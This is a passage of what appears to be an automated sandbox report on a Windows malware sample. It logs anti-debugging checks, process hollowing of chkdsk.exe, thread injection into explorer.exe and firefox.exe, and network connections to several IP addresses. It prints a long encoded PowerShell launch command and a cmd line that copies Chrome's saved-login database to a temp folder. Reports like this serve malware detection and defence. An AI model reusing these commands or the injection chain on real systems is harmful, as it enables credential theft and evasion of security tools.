Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFCAB70 mov eax, dword ptr fs:[00000030h] 27_2_1EFCAB70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFCAB70 mov eax, dword ptr fs:[00000030h] 27_2_1EFCAB70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFCAB70 mov eax, dword ptr fs:[00000030h] 27_2_1EFCAB70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFCAB70 mov eax, dword ptr fs:[00000030h] 27_2_1EFCAB70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFCAB70 mov eax, dword ptr fs:[00000030h] 27_2_1EFCAB70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFCAB70 mov eax, dword ptr fs:[00000030h] 27_2_1EFCAB70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC6B70 mov eax, dword ptr fs:[00000030h] 27_2_1EFC6B70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC6B70 mov eax, dword ptr fs:[00000030h] 27_2_1EFC6B70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC6B70 mov eax, dword ptr fs:[00000030h] 27_2_1EFC6B70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFFBB5B mov esi, dword ptr fs:[00000030h] 27_2_1EFFBB5B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F07DAAF mov eax, dword ptr fs:[00000030h] 27_2_1F07DAAF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F067ABE mov eax, dword ptr fs:[00000030h] 27_2_1F067ABE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFFCB20 mov eax, dword ptr fs:[00000030h] 27_2_1EFFCB20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F094AE8 mov eax, dword ptr fs:[00000030h] 27_2_1F094AE8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFEEB1C mov eax, dword ptr fs:[00000030h] 27_2_1EFEEB1C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFBCB1E mov eax, dword ptr fs:[00000030h] 27_2_1EFBCB1E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC8B10 mov eax, dword ptr fs:[00000030h] 27_2_1EFC8B10
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002F00 NtCreateFile,LdrInitializeThunk, 27_2_1F002F00

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 68.65.122.211 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.18 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 209.99.40.222 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 199.192.29.215 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 180.76.247.231 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.53.179.171 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 198.23.49.173 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: BA0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\chkdsk.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF62D2D0000 Jump to behavior
Encrypted powershell cmdline option found
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #Nandinme5 Bobleka Artikuler hotm Formnin4 Vigesimoki6 stom Echinit6 pronativ Pyro Texttv7 Elevatorfr RAMRODSA Qekursuss beanpo Skrk2 polari medeola Lora Raphi6 #defa pied Tandkdsbe Unimmor Badgerb6 exclus Chondrog8 AEROLO FISHERMANI FAGINTEGR Incepto3 Snurl6 Bisexua dosser gavel metafore tran atak Seismi2 Nonfabul Digtek3 REGNSKA Phytome9 Murae Halv8 VOCIFERATE WOODCRAFT hardheart Knib sejt #Immervk8 Sprogfl REDSHI siffleus Super rifters Grouch Proeveti PROTENSI Lydbillede SUBELECTR Rammetchor CISSESAR Bred jordfste Antisens LOXO #Splurgypy7 Septen Dims Tebrevsunc2 Stttep2 likvide Aftvi pantog vejbyg coco ISBRY PASS Pinf munikat unse GULDR Melodiou panimete Raftesoste avancement Enteasubpr MYCE Tidlnnede3 odyssen dryptrren perso #horn Centr4 Henrykkesl8 FORDAMPNIN Intrafol Caldron infr valg SISYRI Genoako skadegrer Underafsni2 Vaccinat drillerier CHAI #Detoxif afmali Hmmetn Alkoholtyp9 linie TAARN mero Spectro8 stjern Positio Autobio utakne Humanhoo3 ompl Bevisfrels3 Brillefode6 EJENDOMS Turistk4 chantant bondesta BILFRAGTER SIDHEPRE #Skident aanderfiau Tallwoo5 vinologist LOYALE Valeri4 lavin Baar9 forventel Nonconv #PERSONNAV idemp start choyainti loxict Hestebre1 Foelebal Mois Lallet Obelisk3 drikk Lanasr #bestraalin STRMPEH VEDL Myelo Dish Accept1 Unpl3 ARBEJDSLSH Anmeldelse SKOVHYTTE prsteskab Publicis8 Umindel4 #sportsma Dkningss4 Deposi1 regningsfu suspe Deba requir Saltstenm1 RDEPANGI #Selvmodsig SUBD kvksfinge Anom thailnde Ondu nonp WINDB
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #Nandinme5 Bobleka Artikuler hotm Formnin4 Vigesimoki6 stom Echinit6 pronativ Pyro Texttv7 Elevatorfr RAMRODSA Qekursuss beanpo Skrk2 polari medeola Lora Raphi6 #defa pied Tandkdsbe Unimmor Badgerb6 exclus Chondrog8 AEROLO FISHERMANI FAGINTEGR Incepto3 Snurl6 Bisexua dosser gavel metafore tran atak Seismi2 Nonfabul Digtek3 REGNSKA Phytome9 Murae Halv8 VOCIFERATE WOODCRAFT hardheart Knib sejt #Immervk8 Sprogfl REDSHI siffleus Super rifters Grouch Proeveti PROTENSI Lydbillede SUBELECTR Rammetchor CISSESAR Bred jordfste Antisens LOXO #Splurgypy7 Septen Dims Tebrevsunc2 Stttep2 likvide Aftvi pantog vejbyg coco ISBRY PASS Pinf munikat unse GULDR Melodiou panimete Raftesoste avancement Enteasubpr MYCE Tidlnnede3 odyssen dryptrren perso #horn Centr4 Henrykkesl8 FORDAMPNIN Intrafol Caldron infr valg SISYRI Genoako skadegrer Underafsni2 Vaccinat drillerier CHAI #Detoxif afmali Hmmetn Alkoholtyp9 linie TAARN mero Spectro8 stjern Positio Autobio utakne Humanhoo3 ompl Bevisfrels3 Brillefode6 EJENDOMS Turistk4 chantant bondesta BILFRAGTER SIDHEPRE #Skident aanderfiau Tallwoo5 vinologist LOYALE Valeri4 lavin Baar9 forventel Nonconv #PERSONNAV idemp start choyainti loxict Hestebre1 Foelebal Mois Lallet Obelisk3 drikk Lanasr #bestraalin STRMPEH VEDL Myelo Dish Accept1 Unpl3 ARBEJDSLSH Anmeldelse SKOVHYTTE prsteskab Publicis8 Umindel4 #sportsma Dkningss4 Deposi1 regningsfu suspe Deba requir Saltstenm1 RDEPANGI #Selvmodsig SUBD kvksfinge Anom thailnde Ondu nonp WINDB Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\chkdsk.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF62D2D0000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread register set: target process: 4828 Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Thread register set: target process: 4828 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E9C.tmp" "c:\Users\user\AppData\Local\Temp\gkb1wfd4\CSC1FB6CDA7423C41F280B0C76B8C389BB7.TMP" Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe Jump to behavior
Source: explorer.exe, 0000001C.00000000.1713037209.0000000001250000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.2196285943.0000000001250000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.1859640845.0000000001250000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 0000001C.00000000.1812351909.000000000D42A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1720682575.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2204978943.00000000048E0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001C.00000000.1713037209.0000000001250000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.2196285943.0000000001250000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.1859640845.0000000001250000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000001C.00000000.2193873777.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1710641976.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1857434074.0000000000B88000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman
Source: explorer.exe, 0000001C.00000000.1713037209.0000000001250000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.2196285943.0000000001250000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.1859640845.0000000001250000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
